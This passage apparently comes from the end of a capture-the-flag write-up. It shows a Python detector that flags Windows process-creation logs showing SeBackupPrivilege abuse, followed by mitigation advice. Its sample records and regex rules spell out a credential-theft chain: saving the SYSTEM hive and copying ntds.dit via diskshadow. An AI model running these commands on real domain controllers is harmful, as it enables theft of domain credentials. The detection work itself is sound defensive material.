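            hits.append((e["SubjectUserName"], sorted(held)))
    return hits


# Constructed 4688 (process creation) records with the command line captured.
SAMPLE_4688 = [
    {"SubjectUserName": "svc_backup", "CommandLine": "diskshadow /s script.txt"},
    {"SubjectUserName": "svc_backup", "CommandLine": r"reg save HKLM\SYSTEM c:\Users\svc_backup\Documents\system.hive"},
    {"SubjectUserName": "svc_backup",
     "CommandLine": r"Copy-FileSeBackupPrivilege w:\windows\NTDS\ntds.dit c:\users\svc_backup\Documents\ntds.dit -Overwrite"},
    {"SubjectUserName": "Administrator", "CommandLine": r'"C:\Windows\System32\vssadmin.exe" list shadows'},
    {"SubjectUserName": "jdoe", "CommandLine": r"notepad.exe C:\temp\notes.txt"},
]

# (rule name, pattern), matched case-insensitively against the full command line.
RULES = [
    ("diskshadow_scripted", re.compile(r"\bdiskshadow(\.exe)?\s+/s\b", re.I)),
    ("reg_save_secret_hive", re.compile(r"\breg(\.exe)?\s+save\s+hklm\\(system|sam|security)\b", re.I)),
    ("ntds_dit_on_cmdline", re.compile(r"ntds\.dit", re.I)),
]


def find_backup_abuse_commands(events):
    """Return (user, rule) for each process whose command line matches a rule."""
    hits = []
    for e in events:
        for name, pattern in RULES:
            if pattern.search(e["CommandLine"]):
                hits.append((e["SubjectUserName"], name))
                break  # one verdict per process is enough
    return hits
```

On a domain controller, three hits from the same non-administrative account within a few minutes (scripted diskshadow, a SYSTEM hive save and an ntds.dit copy) are the whole attack in order; the mitigation side is to keep SeBackupPrivilege off interactive service accounts and to restrict Backup Operators membership to accounts that actually run backups.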

Closing

A superb machine. Thoroughly enjoyed it.
